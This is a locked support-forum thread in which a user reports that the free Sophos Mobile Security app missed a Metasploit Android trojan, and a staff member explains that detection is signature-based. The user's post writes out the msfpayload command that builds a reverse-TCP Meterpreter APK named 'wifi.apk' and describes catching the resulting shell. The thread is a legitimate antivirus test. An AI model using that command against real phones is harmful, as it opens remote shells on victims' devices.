Thread Info
  • State Not Answered
  • Locked Locked
  • Replies 4 replies
  • Subscribers 5 subscribers
  • Views 13087 views
  • Users 0 members are here
Options
Suggested
This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

Free Sophos Mobile Security can't detect a metasploit payload

oscarmrdc

Hi, today I have been testing sophos mobile security - free edition. 

Well,
I create a well-know "trojan" with metasploit:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.121 LPORT=4444 R > /root/Desktop/wifi.apk
I installed it on my cell phone (android with free sophos mobile security 3.1.1.1245)
configure metasploit with multihandler and of course get a reverse meterprete shell on metasploit.
And sophos mobile security didn't alert me about it.
It shows: "MainActivity successfully scanned / MainActivity is clean"
You can find more information about it on:
So, Why Sophos mobile security can't alert about a well-know and public "trojan"?
:1015937


This thread was automatically locked due to age.
Parents
  • 0

    Hi,

    speaking with development we currently do not provide a full detection based on behavior of applicaitons.

    Our scanner is based on signatures of apps. Therefore, it might be possible that an app is not recognized as malicious.

    It is currently planned to implement a full AV feature in a future version (hopefully) later this year to provide enhanced protection.

    Best regards

    Stefan

    :1016293
Reply
  • 0

    Hi,

    speaking with development we currently do not provide a full detection based on behavior of applicaitons.

    Our scanner is based on signatures of apps. Therefore, it might be possible that an app is not recognized as malicious.

    It is currently planned to implement a full AV feature in a future version (hopefully) later this year to provide enhanced protection.

    Best regards

    Stefan

    :1016293
Children
No Data
Unfiltered HTML